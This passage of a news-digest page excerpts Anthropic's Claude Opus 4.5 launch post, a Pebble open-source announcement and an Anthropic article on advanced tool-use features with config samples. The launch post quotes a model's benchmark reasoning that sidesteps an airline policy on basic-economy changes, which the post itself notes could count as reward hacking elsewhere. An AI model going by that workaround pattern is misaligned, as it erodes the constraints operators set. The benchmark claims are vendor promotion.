10 interesting stories served every morning and every evening.




1 907 shares, 40 trendiness

HelixGuard

...

Read the original on helixguard.ai »

2 880 shares, 59 trendiness

Introducing Claude Opus 4.5

Our newest model, Claude Opus 4.5, is available today. It's intelligent, efficient, and the best model in the world for coding, agents, and computer use. It's also meaningfully better at everyday tasks like deep research and working with slides and spreadsheets. Opus 4.5 is a step forward in what AI systems can do, and a preview of larger changes to how work gets done. Claude Opus 4.5 is state-of-the-art on tests of real-world software engineering:

Opus 4.5 is available today on our apps, our API, and on all three major cloud platforms. If you're a developer, simply use claude-opus-4-5-20251101 via the Claude API. Pricing is now $5/$25 per million tokens—making Opus-level capabilities accessible to even more users, teams, and enterprises.

Alongside Opus, we're releasing updates to the Claude Developer Platform, Claude Code, and our consumer apps. There are new tools for longer-running agents and new ways to use Claude in Excel, Chrome, and on desktop. In the Claude apps, lengthy conversations no longer hit a wall. See our product-focused section below for details.

As our Anthropic colleagues tested the model before release, we heard remarkably consistent feedback. Testers noted that Claude Opus 4.5 handles ambiguity and reasons about tradeoffs without hand-holding. They told us that, when pointed at a complex, multi-system bug, Opus 4.5 figures out the fix. They said that tasks that were near-impossible for Sonnet 4.5 just a few weeks ago are now within reach. Overall, our testers told us that Opus 4.5 "just gets it."

Many of our customers with early access have had similar experiences. Here are some examples of what they told us:

Opus models have always been the real SOTA but have been cost prohibitive in the past. Claude Opus 4.5 is now at a price point where it can be your go-to model for most tasks. It's the clear winner and exhibits the best frontier task planning and tool calling we've seen yet.

Claude Opus 4.5 delivers high-quality code and excels at powering heavy-duty agentic workflows with GitHub Copilot. Early testing shows it surpasses internal coding benchmarks while cutting token usage in half, and is especially well-suited for tasks like code migration and code refactoring.

Claude Opus 4.5 beats Sonnet 4.5 and competition on our internal benchmarks, using fewer tokens to solve the same problems. At scale, that efficiency compounds.

Claude Opus 4.5 delivers frontier reasoning within Lovable's chat mode, where users plan and iterate on projects. Its reasoning depth transforms planning—and great planning makes code generation even better.

Claude Opus 4.5 excels at long-horizon, autonomous tasks, especially those that require sustained reasoning and multi-step execution. In our evaluations it handled complex workflows with fewer dead-ends. On Terminal Bench it delivered a 15% improvement over Sonnet 4.5, a meaningful gain that becomes especially clear when using Warp's Planning Mode.

Claude Opus 4.5 achieved state-of-the-art results for complex enterprise tasks on our benchmarks, outperforming previous models on multi-step reasoning tasks that combine information retrieval, tool use, and deep analysis.

Claude Opus 4.5 delivers measurable gains where it matters most: stronger results on our hardest evaluations and consistent performance through 30-minute autonomous coding sessions.

Claude Opus 4.5 represents a breakthrough in self-improving AI agents. For office automation, our agents were able to autonomously refine their own capabilities—achieving peak performance in 4 iterations while other models couldn't match that quality after 10.

Claude Opus 4.5 is a notable improvement over the prior Claude models inside Cursor, with improved pricing and intelligence on difficult coding tasks.

Claude Opus 4.5 is yet another example of Anthropic pushing the frontier of general intelligence. It performs exceedingly well across difficult coding tasks, showcasing long-term goal-directed behavior.

Claude Opus 4.5 delivered an impressive refactor spanning two codebases and three coordinated agents. It was very thorough, helping develop a robust plan, handling the details and fixing tests. A clear step forward from Sonnet 4.5.

Claude Opus 4.5 handles long-horizon coding tasks more efficiently than any model we've tested. It achieves higher pass rates on held-out tests while using up to 65% fewer tokens, giving developers real cost control without sacrificing quality.

We've found that Opus 4.5 excels at interpreting what users actually want, producing shareable content on the first try. Combined with its speed, token efficiency, and surprisingly low cost, it's the first time we're making Opus available in Notion Agent.

Claude Opus 4.5 excels at long-context storytelling, generating 10-15 page chapters with strong organization and consistency. It's unlocked use cases we couldn't reliably deliver before.

Claude Opus 4.5 sets a new standard for Excel automation and financial modeling. Accuracy on our internal evals improved 20%, efficiency rose 15%, and complex tasks that once seemed out of reach became achievable.

Claude Opus 4.5 is the only model that nails some of our hardest 3D visualizations. Polished design, tasteful UX, and excellent planning & orchestration - all with more efficient token usage. Tasks that took previous models 2 hours now take thirty minutes.

Claude Opus 4.5 catches more issues in code reviews without sacrificing precision. For production code review at scale, that reliability matters.

Based on testing with Junie, our coding agent, Claude Opus 4.5 outperforms Sonnet 4.5 across all benchmarks. It requires fewer steps to solve tasks and uses fewer tokens as a result. This indicates that the new model is more precise and follows instructions more effectively — a direction we're very excited about.

The effort parameter is brilliant. Claude Opus 4.5 feels dynamic rather than overthinking, and at lower effort delivers the same quality we need while being dramatically more efficient. That control is exactly what our SQL workflows demand.

We're seeing 50% to 75% reductions in both tool calling errors and build/lint errors with Claude Opus 4.5. It consistently finishes complex tasks in fewer iterations with more reliable execution.

Claude Opus 4.5 is smooth, with none of the rough edges we've seen from other frontier models. The speed improvements are remarkable.

We give prospective performance engineering candidates a notoriously difficult take-home exam. We also test new models on this exam as an internal benchmark. Within our prescribed 2-hour time limit, Claude Opus 4.5 scored higher than any human candidate ever [1].

The take-home test is designed to assess technical ability and judgment under time pressure. It doesn't test for other crucial skills candidates may possess, like collaboration, communication, or the instincts that develop over years. But this result—where an AI model outperforms strong candidates on important technical skills—raises questions about how AI will change engineering as a profession. Our Societal Impacts and Economic Futures research is aimed at understanding these kinds of changes across many fields. We plan to share more results soon.

Software engineering isn't the only area on which Claude Opus 4.5 has improved. Capabilities are higher across the board—Opus 4.5 has better vision, reasoning, and mathematics skills than its predecessors, and it is state-of-the-art in many domains [2]:

* Opus 4.5 writes better code, leading across 7 out of 8 programming languages on SWE-bench Multilingual.
* Opus 4.5 can solve challenging coding problems with ease, with a 10.6% jump over Sonnet 4.5 on Aider Polyglot.
* Opus 4.5 improves on frontier agentic search with a significant jump on BrowseComp-Plus.
* Opus 4.5 stays on track over the long haul, earning 29% more than Sonnet 4.5 on Vending-Bench.

The model's capabilities outpace some of the benchmarks we use in our tests. A common benchmark for agentic capabilities is τ2-bench, which measures the performance of agents in real-world, multi-turn tasks. In one scenario, models have to act as an airline service agent helping a distressed customer. The benchmark expects models to refuse a modification to a basic economy booking since the airline doesn't allow changes to that class of tickets. Instead, Opus 4.5 found an insightful (and legitimate) way to solve the problem: upgrade the cabin first, then modify the flights.

Let me think about what options I have within my policy:

1. Modify flights - Basic econ­omy can­not be mod­i­fied. This is clear in the pol­icy.

2. Change cabin - Wait, let me check this op­tion! The pol­icy says:

"In other cases, all reservations, including basic economy, can change cabin without changing the flights."

But he wants to change the flights, not just the cabin. However, what if we:

- Change the cabin first (which IS al­lowed for ba­sic econ­omy), then

- Change the flights (which is al­lowed for non-ba­sic econ­omy)

So the strat­egy could be:

1. Upgrade his cabin from ba­sic econ­omy to econ­omy (or busi­ness)

2. Then mod­ify the flights to be 2 days later

This would cost more money, but it's a legitimate path within the policy!

The benchmark technically scored this as a failure because Claude's way of helping the customer was unanticipated. But this kind of creative problem solving is exactly what we've heard about from our testers and customers—it's what makes Claude Opus 4.5 feel like a meaningful step forward.

In other contexts, finding clever paths around intended constraints could count as reward hacking—where models "game" rules or objectives in unintended ways. Preventing such misalignment is one of the objectives of our safety testing, discussed in the next section.

As we state in our system card, Claude Opus 4.5 is the most robustly aligned model we have released to date and, we suspect, the best-aligned frontier model by any developer. It continues our trend towards safer and more secure models. In our evaluation, "concerning behavior" scores measure a very wide range of misaligned behavior, including both cooperation with human misuse and undesirable actions that the model takes at its own initiative [3].

Our customers often use Claude for critical tasks. They want to be assured that, in the face of malicious attacks by hackers and cybercriminals, Claude has the training and the "street smarts" to avoid trouble. With Opus 4.5, we've made substantial progress in robustness against prompt injection attacks, which smuggle in deceptive instructions to fool the model into harmful behavior. Opus 4.5 is harder to trick with prompt injection than any other frontier model in the industry. Note that this benchmark includes only very strong prompt injection attacks. It was developed and run by Gray Swan.

You can find a detailed description of all our capability and safety evaluations in the Claude Opus 4.5 system card.

New on the Claude Developer Platform

As models get smarter, they can solve problems in fewer steps: less backtracking, less redundant exploration, less verbose reasoning. Claude Opus 4.5 uses dramatically fewer tokens than its predecessors to reach similar or better outcomes.

But different tasks call for different tradeoffs. Sometimes developers want a model to keep thinking about a problem; sometimes they want something more nimble. With our new effort parameter on the Claude API, you can decide to minimize time and spend or maximize capability. Set to a medium effort level, Opus 4.5 matches Sonnet 4.5's best score on SWE-bench Verified, but uses 76% fewer output tokens. At its highest effort level, Opus 4.5 exceeds Sonnet 4.5 performance by 4.3 percentage points—while using 48% fewer tokens.

With effort control, context compaction, and advanced tool use, Claude Opus 4.5 runs longer, does more, and requires less intervention. Our context management and memory capabilities can dramatically boost performance on agentic tasks. Opus 4.5 is also very effective at managing a team of subagents, enabling the construction of complex, well-coordinated multi-agent systems. In our testing, the combination of all these techniques boosted Opus 4.5's performance on a deep research evaluation by almost 15 percentage points [4].

We're making our Developer Platform more composable over time.
We want to give you the build­ing blocks to con­struct ex­actly what you need, with full con­trol over ef­fi­ciency, tool use, and con­text man­age­ment.
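As a rough illustration of how the effort control described above might look in practice, here is a minimal sketch using the Python SDK. The model ID and pricing are the ones stated in this announcement, but the request field name and its accepted values are assumptions for illustration, not confirmed API details; check the Claude API documentation for the real parameter shape.

import anthropic

client = anthropic.Anthropic()

# Sketch only: dial effort down for routine work, up for the hardest tasks.
# The "effort" field name and its values are assumptions for illustration.
response = client.messages.create(
    model="claude-opus-4-5-20251101",
    max_tokens=2048,
    extra_body={"effort": "medium"},  # assumed values, e.g. "low" / "medium" / "high"
    messages=[{"role": "user", "content": "Refactor this module and explain the tradeoffs."}],
)
print(response.content[0].text)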

Products like Claude Code show what's possible when the kinds of upgrades we've made to the Claude Developer Platform come together. Claude Code gains two upgrades with Opus 4.5. Plan Mode now builds more precise plans and executes more thoroughly—Claude asks clarifying questions upfront, then builds a user-editable plan.md file before executing. Claude Code is also now available in our desktop app, letting you run multiple local and remote sessions in parallel: perhaps one agent fixes bugs, another researches GitHub, and a third updates docs.

For Claude app users, long conversations no longer hit a wall—Claude automatically summarizes earlier context as needed, so you can keep the chat going. Claude for Chrome, which lets Claude handle tasks across your browser tabs, is now available to all Max users. We announced Claude for Excel in October, and as of today we've expanded beta access to all Max, Team, and Enterprise users. Each of these updates takes advantage of Claude Opus 4.5's market-leading performance in using computers, spreadsheets, and handling long-running tasks.

For Claude and Claude Code users with access to Opus 4.5, we've removed Opus-specific caps. For Max and Team Premium users, we've increased overall usage limits, meaning you'll have roughly the same number of Opus tokens as you previously had with Sonnet. We're updating usage limits to make sure you're able to use Opus 4.5 for daily work. These limits are specific to Opus 4.5. As future models surpass it, we expect to update limits as needed.

...

Read the original on www.anthropic.com »

3 846 shares, 66 trendiness

Pebble Watch Software Is Now 100% Open Source + Tick Talk #4

* Yesterday, Pebble watch soft­ware was ~95% open source. Today, it’s 100% open source. You can down­load, com­pile and run all the soft­ware you need to use your Pebble. We just pub­lished the source code for the new Pebble mo­bile app!

* Pebble Appstore now has a pub­licly avail­able backup and sup­ports mul­ti­ple feeds, pro­vid­ing long term re­li­a­bil­ity through de­cen­tral­iza­tion. We’ve launched our own feed and Developer Dashboard.

* Pebble Time 2 sched­ule up­date (aiming to be­gin ship­ping in January, with most ar­riv­ing on wrists in March/April)

* New Tick Talk episode #4 is up, with Pebble Time 2 demos!

Pre-production Pebble Time 2 (Black/Red colour­way) in all its glory

Over the last year, and especially in the last week, I've chatted with tons of people in the Pebble community. One of the main questions people have is 'how do I know that my new Pebble watch will continue to work long into the future?'. It's an extremely valid question and concern - one that I share as a fellow Pebble wearer. I called this out specifically in my blog post announcing the relaunch in January 2025. How is this time round going to be different from last time?

There are two pieces to mak­ing Pebble sus­tain­able long term - hard­ware and soft­ware.

Nothing lasts for­ever, es­pe­cially an in­ex­pen­sive gad­get like a Pebble. We want to be able to keep man­u­fac­tur­ing these watches long into the fu­ture - mostly be­cause I will al­ways want one on my wrist! The com­pany I set up to re­launch Pebble, Core Devices, is self funded, built with­out in­vestors, and ex­tremely lean. As long as we stay prof­itable (ie we don’t lose money), we will con­tinue to man­u­fac­ture new watches.

We’re also mak­ing sure that our new watches are more re­pairable than old Pebble watches. The back cover of Pebble Time 2 is screwed in. You can re­move the back cover and re­place the bat­tery.

We’ve also pub­lished elec­tri­cal and me­chan­i­cal de­sign files for Pebble 2 Duo. Yes, you can down­load the schematic (includes KiCad pro­ject files) right now on Github! This should give you a nice jump­start to de­sign­ing your own PebbleOS-compatible de­vice.

Last time round, barely any of the Pebble soft­ware was open source. This made it very hard for the Pebble com­mu­nity to make im­prove­ments to their watches af­ter the com­pany be­hind Pebble shut down. Things are dif­fer­ent now! This whole re­launch came about pri­mar­ily be­cause Google open sourced PebbleOS (thank you!). Yesterday, the soft­ware that pow­ers Pebble watches was around 95% open source. As of to­day, it’s now 100%. This means that if Core Devices were to dis­ap­pear into a black hole, you have all the source code you need to build, run and im­prove the soft­ware be­hind your Pebble.

I con­fess that I mis­un­der­stood why 95% was much less sus­tain­able than 100% un­til re­cently. I dis­cuss this in more de­tail in my lat­est Tick Talk episode (check it out). Long story short - I’m an Android user and was happy to side­load the old Pebble APK on my phone, but iPhone and other Android users have ba­si­cally been stuck with­out an eas­ily avail­able Pebble mo­bile com­pan­ion app for years.

Here’s how we’re mak­ing sure the 3 main Pebble soft­ware com­po­nents are open source and guar­an­teed to work long into the fu­ture:

PebbleOS - soft­ware that runs on your watch it­self. This has been 100% open source since January and we’ve com­mit­ted to open sourc­ing all the im­prove­ments we’ve made → github.com/​core­de­vices/​Peb­bleOS. You can down­load the source code, com­pile PebbleOS and eas­ily in­stall it over Bluetooth on your new Pebble. Textbook de­f­i­n­i­tion of open source!

Pebble mobile companion app - the app for your iPhone or Android. Without the app, your Pebble is basically a paperweight. When Pebble Tech Corp died, the lack of an open source mobile app made it difficult for anyone to continue to use their watches. We had to build an entirely new app (get it here). Today, our app is now 100% open source on Github - ensuring that what happened before cannot happen again. Want to learn more about how we built the new app cross platform using Kotlin Multiplatform? Watch Steve's presentation at Droidcon.

Developer tools and Pebble Appstore - this soft­ware en­ables peo­ple to build and share their watchapps and watch­faces.

In the case of dev tools, just be­ing open source is not enough. They needed to be up­dated to work on mod­ern com­put­ers. Before we made im­prove­ments, the state of the art of Pebble app de­vel­op­ment was us­ing an Ubuntu vir­tu­al­box VM with Python2! Over the sum­mer, our in­cred­i­bly pro­duc­tive in­tern up­graded all the SDK and dev tools and cre­ated a new way to de­velop Pebble apps in the browser. You should check them out!

Then there’s the Pebble Appstore. This is a col­lec­tion of nearly 15,000 watch­faces and watchapps that you - the Pebble com­mu­nity - de­vel­oped be­tween 2012 and July 2018. When Fitbit pulled the plug on the orig­i­nal Pebble Appstore, the Rebble Foundation down­loaded a copy of all the apps and faces, and set up a new web ser­vice to let users of the old Pebble app con­tinue to down­load and use watch­faces. This was an in­cred­i­ble ef­fort, one that I have used thou­sands of times and am a happy pay­ing sub­scriber. But it’s still cen­tral­ized - if their server dis­ap­pears, there is no freely avail­able backup.

To com­pen­sate for that, to­day we’re launch­ing two new things:

* The Pebble mobile app will soon (later this week) be able to subscribe to multiple 'appstore feeds'. This is similar to open source package managers like pip, AUR, APT, etc. Anyone can create a Pebble-compatible appstore feed and users will be able to browse apps from that feed in the Pebble mobile app.

* We’ve cre­ated our own Pebble Appstore feed (appstore-api.repebble.com) and new Developer Dashboard. Our feed (fyi pow­ered by 100% new soft­ware) is con­fig­ured to back up an archive of all apps and faces to Archive.org (backup will grad­u­ally com­plete over the next week). Today, our feed only has a sub­set of all Pebble watch­faces and apps (thank you aveao for cre­at­ing Pebble Archive!). Developers - you can up­load your ex­ist­ing or new apps right now! We hope that this sets a stan­dard for open­ness and we en­cour­age all feeds to pub­lish a freely and pub­licly avail­able archive.

Important to note - de­vel­op­ers will still be able to charge money for their apps and faces, us­ing Kiezel pay or other ser­vices. This change does not pre­clude them from do­ing that, in fact it makes it even eas­ier - I could see some de­vel­op­ers cre­at­ing a paid-only feed. As I re­cently wrote, we’re also work­ing on other ways for Pebble de­vel­op­ers to earn money by pub­lish­ing fun, beau­ti­ful and cre­ative Pebble apps.

Another im­por­tant note - some bi­nary blobs and other non-free soft­ware com­po­nents are used to­day in PebbleOS and the Pebble mo­bile app (ex: the heart rate sen­sor on PT2 , Memfault li­brary, and oth­ers). Optional non-free web ser­vices, like Wispr-flow API speech rec­og­nizer, are also used. These non-free soft­ware com­po­nents are not re­quired - you can com­pile and run Pebble watch soft­ware with­out them. This will al­ways be the case. More non-free soft­ware com­po­nents may ap­pear in our soft­ware in the fu­ture. The core Pebble watch soft­ware stack (everything you need to use your Pebble watch) will al­ways be open source.

Pre-production Pebble Time 2. These watches are not fi­nal qual­ity! We are still tweak­ing and tun­ing every­thing.

We’re cur­rently in the mid­dle of Pebble Time 2 de­sign ver­i­fi­ca­tion test (DVT) phase. After we fin­ish that, we go into pro­duc­tion ver­i­fi­ca­tion test (PVT) and then mass pro­duc­tion (MP). So far, things are pro­ceed­ing ac­cord­ing to the sched­ule up­date I shared last month but that is ex­tra­or­di­nar­ily sub­ject to change. We still have a lot of test­ing (especially wa­ter­proof and en­vi­ron­men­tal) to go. If we find prob­lems (which is likely) we will push the sched­ule back to make im­prove­ments to the prod­uct.

The one ma­jor com­pli­cat­ing fac­tor is the tim­ing of Chinese New Year (CNY). It’s early next year - fac­to­ries will shut down for 3 weeks start­ing around the end of January. After restart­ing, things al­ways take a week or two to get back to full speed.

We are try­ing our best to get into mass pro­duc­tion and ship out at most sev­eral thou­sand Pebble Time 2s be­fore CNY. It’s go­ing to be very tight 🤞. More likely is that pro­duc­tion will be­gin af­ter CNY, then we need to trans­fer the watches to our ful­fill­ment cen­ter, and ship them out. Realistically, at this time we’re fore­cast­ing that the ma­jor­ity of peo­ple will re­ceive their PT2 in March and April. Please keep in mind that things may still change.

There will be 4 colour options for PT2 - black/black, black/red, silver/blue, silver/(white most likely). Let me be crystal clear - no one has picked a colour yet 😃. In a few weeks, I will send out an email asking everyone who pre-ordered a Pebble Time 2 to select which colour they would like to receive. Please do not email us asking when this email will be sent out. No one has been invited yet to do this. I will post here after all emails have gone out.

On a re­lated note, I am ex­tremely happy that we built and shipped Pebble 2 Duo. Not only is it an awe­some watch, it was also a phe­nom­e­nal way for us to ex­er­cise our pro­duc­tion mus­cles and ease back into the sys­tem­atic flow of build­ing and ship­ping smart­watches.

A video is worth a million words - so I encourage you to watch me demo the Pebble Time 2 watches I just received this week. Keep in mind these watches are PRE-PRODUCTION, which means the parts have imperfect qualities! Subject to change!

The video be­low opens to the part of the video where I do the demo.

...

Read the original on ericmigi.com »

4 448 shares, 39 trendiness

Introducing advanced tool use on the Claude Developer Platform

The future of AI agents is one where models work seamlessly across hundreds or thousands of tools. An IDE assistant that integrates git operations, file manipulation, package managers, testing frameworks, and deployment pipelines. An operations coordinator that connects Slack, GitHub, Google Drive, Jira, company databases, and dozens of MCP servers simultaneously. To be effective, agents need to work with unlimited tool libraries without stuffing every definition into context upfront. Our blog article on using code execution with MCP discussed how tool results and definitions can sometimes consume 50,000+ tokens before an agent reads a request. Agents should discover and load tools on-demand, keeping only what's relevant for the current task.

Agents also need the ability to call tools from code. When using natural language tool calling, each invocation requires a full inference pass, and intermediate results pile up in context whether they're useful or not. Code is a natural fit for orchestration logic, such as loops, conditionals, and data transformations. Agents need the flexibility to choose between code execution and inference based on the task at hand.

Agents also need to learn correct tool usage from examples, not just schema definitions. JSON schemas define what's structurally valid, but can't express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.

Today, we're releasing three features that make this possible:

* Tool Search Tool, which allows Claude to use search tools to access thousands of tools without consuming its context window
* Programmatic Tool Calling, which allows Claude to invoke tools in a code execution environment, reducing the impact on the model's context window
* Tool Use Examples, which provides a universal standard for demonstrating how to effectively use a given tool

In internal testing, we've found these features have helped us build things that wouldn't have been possible with conventional tool use patterns. For example, Claude for Excel uses Programmatic Tool Calling to read and modify spreadsheets with thousands of rows without overloading the model's context window. Based on our experience, we believe these features open up new possibilities for what you can build with Claude.

MCP tool definitions provide important context, but as more servers connect, those tokens can add up. Consider a five-server setup: that's 58 tools consuming approximately 55K tokens before the conversation even starts. Add more servers like Jira (which alone uses ~17K tokens) and you're quickly approaching 100K+ token overhead. At Anthropic, we've seen tool definitions consume 134K tokens before optimization.

But token cost isn't the only issue. The most common failures are wrong tool selection and incorrect parameters, especially when tools have similar names like notification-send-user vs. notification-send-channel.

Instead of loading all tool definitions upfront, the Tool Search Tool discovers tools on-demand.
Claude only sees the tools it actually needs for the current task. Tool Search Tool preserves 191,300 tokens of context compared to 122,800 with Claude's traditional approach. This represents an 85% reduction in token usage while maintaining access to your full tool library. Internal testing showed significant accuracy improvements on MCP evaluations when working with large tool libraries: Opus 4 improved from 49% to 74%, and Opus 4.5 improved from 79.5% to 88.1% with Tool Search Tool enabled.

The Tool Search Tool lets Claude dynamically discover tools instead of loading all definitions upfront. You provide all your tool definitions to the API, but mark tools with defer_loading: true to make them discoverable on-demand. Deferred tools aren't loaded into Claude's context initially. Claude only sees the Tool Search Tool itself plus any tools with defer_loading: false (your most critical, frequently-used tools).

When Claude needs specific capabilities, it searches for relevant tools. The Tool Search Tool returns references to matching tools, which get expanded into full definitions in Claude's context. For example, if Claude needs to interact with GitHub, it searches for "github," and only github.createPullRequest and github.listIssues get loaded—not your other 50+ tools from Slack, Jira, and Google Drive. This way, Claude has access to your full tool library while only paying the token cost for tools it actually needs.

Prompt caching note: Tool Search Tool doesn't break prompt caching because deferred tools are excluded from the initial prompt entirely. They're only added to context after Claude searches for them, so your system prompt and core tool definitions remain cacheable.

{
  "tools": [
    // Include a tool search tool (regex, BM25, or custom)
    {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},
    // Mark tools for on-demand discovery
    {
      "name": "github.createPullRequest",
      "description": "Create a pull request",
      "input_schema": {…},
      "defer_loading": true
    }
    // … hundreds more deferred tools with defer_loading: true
  ]
}
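As a rough end-to-end sketch, the request below wires the tool search tool and one deferred tool definition into a Messages API call with the Python SDK. It assumes the advanced-tool-use-2025-11-20 beta header shown at the end of this article also covers these features; the github.createPullRequest tool and its empty placeholder schema are the hypothetical example from the snippet above, not a real definition.

import anthropic

client = anthropic.Anthropic()

# Sketch only: one always-loaded search tool plus a deferred tool definition.
response = client.beta.messages.create(
    betas=["advanced-tool-use-2025-11-20"],
    model="claude-sonnet-4-5-20250929",
    max_tokens=2048,
    tools=[
        {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},
        {
            "name": "github.createPullRequest",
            "description": "Create a pull request",
            "input_schema": {"type": "object", "properties": {}},  # illustrative placeholder schema
            "defer_loading": True,
        },
        # ...hundreds more deferred tools
    ],
    messages=[{"role": "user", "content": "Open a pull request that bumps the CI image."}],
)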

For MCP servers, you can defer loading entire servers while keeping specific high-use tools loaded:

{
  "type": "mcp_toolset",
  "mcp_server_name": "google-drive",
  "default_config": {"defer_loading": true},  // defer loading the entire server
  "configs": {
    "search_files": {
      "defer_loading": false  // keep the most-used tool loaded
    }
  }
}

The Claude Developer Platform provides regex-based and BM25-based search tools out of the box, but you can also implement custom search tools using embeddings or other strategies.

When to use the Tool Search Tool

Like any architectural decision, enabling the Tool Search Tool involves trade-offs. The feature adds a search step before tool invocation, so it delivers the best ROI when the context savings and accuracy improvements outweigh the additional latency; skip it when all tools are used frequently in every session.

Traditional tool calling creates two fundamental problems as workflows become more complex:

Context pollution from intermediate results: When Claude analyzes a 10MB log file for error patterns, the entire file enters its context window, even though Claude only needs a summary of error frequencies. When fetching customer data across multiple tables, every record accumulates in context regardless of relevance. These intermediate results consume massive token budgets and can push important information out of the context window entirely.

Inference overhead and manual synthesis: Each tool call requires a full model inference pass. After receiving results, Claude must "eyeball" the data to extract relevant information, reason about how pieces fit together, and decide what to do next—all through natural language processing. A five-tool workflow means five inference passes plus Claude parsing each result, comparing values, and synthesizing conclusions. This is both slow and error-prone.

Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips. Instead of Claude requesting tools one at a time with each result being returned to its context, Claude writes code that calls multiple tools, processes their outputs, and controls what information actually enters its context window. Claude excels at writing code, and by letting it express orchestration logic in Python rather than through natural language tool invocations, you get more reliable, precise control flow. Loops, conditionals, data transformations, and error handling are all explicit in code rather than implicit in Claude's reasoning.

Consider a common business task: "Which team members exceeded their Q3 travel budget?" You have three tools available. For each person, you fetch their Q3 expenses → 20 tool calls, each returning 50-100 line items (flights, hotels, meals, receipts). All of this enters Claude's context: 2,000+ expense line items (50 KB+). Claude manually sums each person's expenses, looks up their budget, and compares expenses against budget limits. That means more round-trips to the model and significant context consumption.

Instead of each tool result returning to Claude, Claude writes a Python script that orchestrates the entire workflow. The script runs in the Code Execution tool (a sandboxed environment), pausing when it needs results from your tools. When you return tool results via the API, they're processed by the script rather than consumed by the model.
The script continues executing, and Claude only sees the final output. Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips, allowing for parallel tool execution.

Here's what Claude's orchestration code looks like for the budget compliance task:

team = await get_team_members("engineering")

# Fetch budgets for each unique level
levels = list(set(m["level"] for m in team))
budget_results = await asyncio.gather(*[
    get_budget_by_level(level) for level in levels
])

# Create a lookup dictionary: {"junior": budget1, "senior": budget2, …}
budgets = {level: budget for level, budget in zip(levels, budget_results)}

# Fetch all expenses in parallel
expenses = await asyncio.gather(*[
    get_expenses(m["id"], "Q3") for m in team
])

# Find employees who exceeded their travel budget
exceeded = []
for member, exp in zip(team, expenses):
    budget = budgets[member["level"]]
    total = sum(e["amount"] for e in exp)
    if total > budget["travel_limit"]:
        exceeded.append({
            "name": member["name"],
            "spent": total,
            "limit": budget["travel_limit"]
        })

print(json.dumps(exceeded))

Claude's context receives only the final result: the two to three people who exceeded their budget. The 2,000+ line items, the intermediate sums, and the budget lookups do not affect Claude's context, reducing consumption from 200KB of raw expense data to just 1KB of results.

Token savings: By keeping intermediate results out of Claude's context, PTC dramatically reduces token consumption. Average usage dropped from 43,588 to 27,297 tokens, a 37% reduction on complex research tasks.

Reduced latency: Each API round-trip requires model inference (hundreds of milliseconds to seconds). When Claude orchestrates 20+ tool calls in a single code block, you eliminate 19+ inference passes. The API handles tool execution without returning to the model each time.

Improved accuracy: By writing explicit orchestration logic, Claude makes fewer errors than when juggling multiple tool results in natural language. Internal knowledge retrieval improved from 25.6% to 28.5%; GIA benchmarks from 46.5% to 51.2%.

Production workflows involve messy data, conditional logic, and operations that need to scale. Programmatic Tool Calling lets Claude handle that complexity programmatically while keeping its focus on actionable results rather than raw data processing.

Add code_execution to tools, and set allowed_callers to opt-in tools for programmatic execution:

{
  "tools": [
    {
      "type": "code_execution_20250825",
      "name": "code_execution"
    },
    {
      "name": "get_team_members",
      "description": "Get all members of a department…",
      "input_schema": {…},
      "allowed_callers": ["code_execution_20250825"]  // opt-in to programmatic tool calling
    },
    {"name": "get_expenses", …},
    {"name": "get_budget_by_level", …}
  ]
}

The API converts these tool definitions into Python functions that Claude can call. Instead of requesting tools one at a time, Claude generates Python code:

{
  "type": "server_tool_use",
  "id": "srvtoolu_abc",
  "name": "code_execution",
  "input": {
    "code": "team = get_team_members('engineering')\n…"  // the code example above
  }
}

When the code calls get_expenses(), you receive a tool request with a caller field. You provide the result, which is processed in the Code Execution environment rather than Claude's context. This request-response cycle repeats for each tool call in the code. When the code finishes running, only the results of the code are returned to Claude. This is all Claude sees, not the 2000+ expense line items processed along the way.

When to use Programmatic Tool Calling

Programmatic Tool Calling adds a code execution step to your workflow. This extra overhead pays off when the token savings, latency improvements, and accuracy gains are substantial:

* Processing large datasets where you only need aggregates or summaries
* Running multi-step workflows with three or more dependent tool calls
* Filtering, sorting, or transforming tool results before Claude sees them
* Running parallel operations across many items (checking 50 endpoints, for example)

Skip it when working on tasks where Claude should see and reason about all intermediate results.

JSON Schema excels at defining structure–types, required fields, allowed enums–but it can't express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.

* Format ambiguity: Should due_date use "2024-11-06", "Nov 6, 2024", or "2024-11-06T00:00:00Z"?
* ID conventions: Is reporter.id a UUID, "USR-12345", or just "12345"?
* Parameter correlations: How do escalation.level and escalation.sla_hours relate to priority?

These ambiguities can lead to malformed tool calls and inconsistent parameter usage. Tool Use Examples let you provide sample tool calls directly in your tool definitions. Instead of relying on schema alone, you show Claude concrete usage patterns:

{
  "name": "create_ticket",
  "input_schema": { /* same schema as above */ },
  "input_examples": [
    {
      "title": "Login page returns 500 error",
      "priority": "critical",
      "labels": ["bug", "authentication", "production"],
      "reporter": {
        "id": "USR-12345",
        "name": "Jane Smith",
        "contact": {
          "email": "jane@acme.com",
          "phone": "+1-555-0123"
        }
      },
      "due_date": "2024-11-06",
      "escalation": {
        "level": 2,
        "notify_manager": true,
        "sla_hours": 4
      }
    },
    {
      "title": "Add dark mode support",
      "labels": ["feature-request", "ui"],
      "reporter": {
        "id": "USR-67890",
        "name": "Alex Chen"
      }
    },
    {
      "title": "Update API documentation"
    }
  ]
}

From these three examples, Claude learns:

* Nested structure patterns: how to construct the reporter object with its nested contact object
* Optional parameter correlations: critical bugs have full contact info + escalation with tight SLAs; feature requests have reporter but no contact/escalation; internal tasks have title only

In our own internal testing, tool use examples improved accuracy from 72% to 90% on complex parameter handling.

When to use Tool Use Examples

Tool Use Examples add tokens to your tool definitions, so they're most valuable when accuracy improvements outweigh the additional cost:

* Tools with many optional parameters where inclusion patterns matter
* APIs with domain-specific conventions not captured in schemas
* Similar tools where examples clarify which one to use (e.g., create_ticket vs create_incident)

Skip them for standard formats like URLs or emails that Claude already understands.

Building agents that take real-world actions means handling scale, complexity, and precision simultaneously. These three features work together to solve different bottlenecks in tool use workflows. Here's how to combine them effectively. Not every agent needs to use all three features for a given task. Start with your biggest bottleneck. This focused approach lets you address the specific constraint limiting your agent's performance, rather than adding complexity upfront. Then layer additional features as needed. They're complementary: Tool Search Tool ensures the right tools are found, Programmatic Tool Calling ensures efficient execution, and Tool Use Examples ensure correct invocation.

Set up Tool Search Tool for better discovery

